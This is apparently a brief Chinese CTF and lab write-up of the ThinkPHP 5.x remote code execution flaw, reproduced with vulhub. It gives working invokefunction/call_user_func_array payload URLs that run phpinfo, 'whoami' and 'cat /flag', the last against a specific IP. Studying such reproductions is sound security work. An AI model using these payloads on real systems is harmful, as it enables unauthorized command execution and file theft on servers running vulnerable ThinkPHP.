在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
ThinkPHP 命令执行漏洞5.x < 5.1.31, <= 5.0.23 参考:https://www.cnblogs.com/backlion/p/10106676.html
这是一个远程代码执行漏洞,先学习vulhub复现这个漏洞的过程: 输入:http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,可执行phpinfo: 拉到页面底部,看到ThinkPHP的版本是5.0.20:
可以执行phpinfo,那可不可以执行其他命令呢?查了一下网上的payload,如下: 输入:http://your-ip:8080/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 返回:www-data www-data
http://220.249.52.133:49560/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag 得到答案
|
2022-08-16
2022-09-04
2022-08-17
2022-08-12
2022-08-15
请发表评论